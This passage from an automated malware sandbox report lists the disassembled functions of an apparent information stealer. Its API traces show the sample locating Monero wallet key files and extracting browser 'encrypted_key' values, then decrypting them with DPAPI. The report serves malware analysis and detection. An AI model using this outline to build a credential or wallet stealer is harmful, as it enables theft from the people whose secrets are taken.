                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00C71580,00C70D92), ref: 00C5F54C
                              • lstrlen.KERNEL32(00000000), ref: 00C5F56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 6cccb7d4db3a41a7597e9e27a0c61601f272ad5d47751a44ef4f97d35c97c9f7
                              • Instruction ID: f1b9e97d76a2812eb37321f6ef20c739c89ddfcae82ca94bbc0eb65019c9e054
                              • Opcode Fuzzy Hash: 6cccb7d4db3a41a7597e9e27a0c61601f272ad5d47751a44ef4f97d35c97c9f7
                              • Instruction Fuzzy Hash: FA513075D10108AADB28FFA4DCD6DED7378AF58300F508528F916B7191EE346A09DFA2
                              Function 00C63560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: f3af7c1a80edfc1efa85e8818d24599d7166a9872e4e36482b324f10e00abe13
                              • Instruction ID: daaab37eadb764457445e4412d7a491fbce87024eed9526bb13ae60541874a32
                              • Opcode Fuzzy Hash: f3af7c1a80edfc1efa85e8818d24599d7166a9872e4e36482b324f10e00abe13
                              • Instruction Fuzzy Hash: 37414CB1D10109AFCB24EFE5D885AEEB774BF58304F108029F41676291DB74AA09DFA2
                              Function 00C59CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C599EC
                                • Part of subcall function 00C599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C59A11
                                • Part of subcall function 00C599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C59A31
                                • Part of subcall function 00C599C0: ReadFile.KERNEL32(000000FF,?,00000000,00C5148F,00000000), ref: 00C59A5A
                                • Part of subcall function 00C599C0: LocalFree.KERNEL32(00C5148F), ref: 00C59A90
                                • Part of subcall function 00C599C0: CloseHandle.KERNEL32(000000FF), ref: 00C59A9A
                                • Part of subcall function 00C68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C68E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C59D39
                                • Part of subcall function 00C59AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C54EEE,00000000,00000000), ref: 00C59AEF
                                • Part of subcall function 00C59AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C54EEE,00000000,?), ref: 00C59B01
                                • Part of subcall function 00C59AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C54EEE,00000000,00000000), ref: 00C59B2A
                                • Part of subcall function 00C59AC0: LocalFree.KERNEL32(?,?,?,?,00C54EEE,00000000,?), ref: 00C59B3F
                                • Part of subcall function 00C59B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C59B84
                                • Part of subcall function 00C59B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00C59BA3
                                • Part of subcall function 00C59B60: LocalFree.KERNEL32(?), ref: 00C59BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 5c6d70df82a5e154b7447581497c2418299f3243393bcc4bf66a3712753202db
                              • Instruction ID: 7b1677e23ca7c58b31ed20e3de7f0b4e074a7f14ed858cb769142bb251e9c393
                              • Opcode Fuzzy Hash: 5c6d70df82a5e154b7447581497c2418299f3243393bcc4bf66a3712753202db
                              • Instruction Fuzzy Hash: 6A315EB9D10208EBCB14DFE4DC85AEEB7B8EF48305F144559E915A3241E7309A48CBA5
                              Function 00C692E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00C63AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00C63AEE,?), ref: 00C692FC
                              • GetFileSizeEx.KERNEL32(000000FF,00C63AEE), ref: 00C69319
                              • CloseHandle.KERNEL32(000000FF), ref: 00C69327
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: 94a94fd780c9e4567437e9ae1181f331154b47527fbab4f4b05a17548949a740
                              • Instruction ID: 99704cef5a0cd746bf63c84b5837a3338a78540721af5fbcb3afe872319246e7
                              • Opcode Fuzzy Hash: 94a94fd780c9e4567437e9ae1181f331154b47527fbab4f4b05a17548949a740
                              • Instruction Fuzzy Hash: 97F03C75E40208BBDB20DBF2DC49B9E77B9EF48710F108266BA51A72D0D6B096058B80
                              Function 00C6C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 00C6C74E
                                • Part of subcall function 00C6BF9F: __amsg_exit.LIBCMT ref: 00C6BFAF
                              • __getptd.LIBCMT ref: 00C6C765
                              • __amsg_exit.LIBCMT ref: 00C6C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00C6C797
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 79020f07f2fea1cc3b71d798e742dfd7f998fdaba9d80c9cb0963cd357a03a1a
                              • Instruction ID: 4c7e8641ea152ad6f84a36ed084c5d9e2799a4021d6d4fc33167238326fb2a4d
                              • Opcode Fuzzy Hash: 79020f07f2fea1cc3b71d798e742dfd7f998fdaba9d80c9cb0963cd357a03a1a
                              • Instruction Fuzzy Hash: C1F090329012009BD770BBF898C776E33A06F00720F204149F564E61D2DF645D81AF57
                              Function 00C64F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C68E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00C64F7A
                              • lstrcat.KERNEL32(?,00C71070), ref: 00C64F97
                              • lstrcat.KERNEL32(?,007F8F28), ref: 00C64FAB
                              • lstrcat.KERNEL32(?,00C71074), ref: 00C64FBD
                                • Part of subcall function 00C64910: wsprintfA.USER32 ref: 00C6492C
                                • Part of subcall function 00C64910: FindFirstFileA.KERNEL32(?,?), ref: 00C64943
                                • Part of subcall function 00C64910: StrCmpCA.SHLWAPI(?,00C70FDC), ref: 00C64971
                                • Part of subcall function 00C64910: StrCmpCA.SHLWAPI(?,00C70FE0), ref: 00C64987
                                • Part of subcall function 00C64910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C64B7D
                                • Part of subcall function 00C64910: FindClose.KERNEL32(000000FF), ref: 00C64B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 75b8da1ae65d82ec9e96f22a7b6a895211a83e8bff0bb1262e336795e63949a7
                              • Instruction ID: f9e2816090fd37084ec185b3f7ae2b72ad4b3adb11a8de9495d3a847cb1ecf65
                              • Opcode Fuzzy Hash: 75b8da1ae65d82ec9e96f22a7b6a895211a83e8bff0bb1262e336795e63949a7
                              • Instruction Fuzzy Hash: 0A219B76900204ABCB64FBB0DC86FED337CAB54700F444566B65963181EE7496CDDBE2